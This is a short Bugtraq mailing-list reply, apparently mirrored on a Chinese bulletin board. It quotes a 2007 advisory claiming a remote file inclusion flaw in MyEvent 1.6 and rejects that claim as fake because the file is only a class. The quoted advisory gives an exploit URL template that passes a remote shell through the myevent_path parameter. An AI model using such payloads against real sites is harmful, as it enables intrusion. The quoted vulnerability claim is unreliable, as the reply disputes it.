Re: MyEvent1.6 (template.php) Remote File Inclusion Vulnerabilit

看板Bugtraq作者時間18年前 (2007/06/03 01:50), 編輯推噓0(000)
留言0則, 0人參與, 最新討論串1/1
Another fake, the entire file is a class. /str0ke On 2 Jun 2007 07:07:53 -0000, yaser@gencturk.net <yaser@gencturk.net> wrote: > ######################################################################### > # > # MyEvent1.6 (template.php) Remote File Inclusion Vulnerability > # > # Author: Yaser <yaser@gencturk.net> > # > # Homepage: http://www.ayyildiz.org > # > ######################################################################### > > > > ######################################################################### > # Download S : http://mywebland.com/download.php?id=6 > # > # ERROR: > # > # include_once($myevent_path.'includes/template.php') > # > # Exploit: > # http://[site]/[PaTh]/includes/template.php?myevent_path=[shell] > # > ######################################################################### > > Thanks: ir4dex - ht08 - ajann - H0tturk - Zakix - Devil Hacker >
文章代碼(AID): #16OQtl00 (Bugtraq)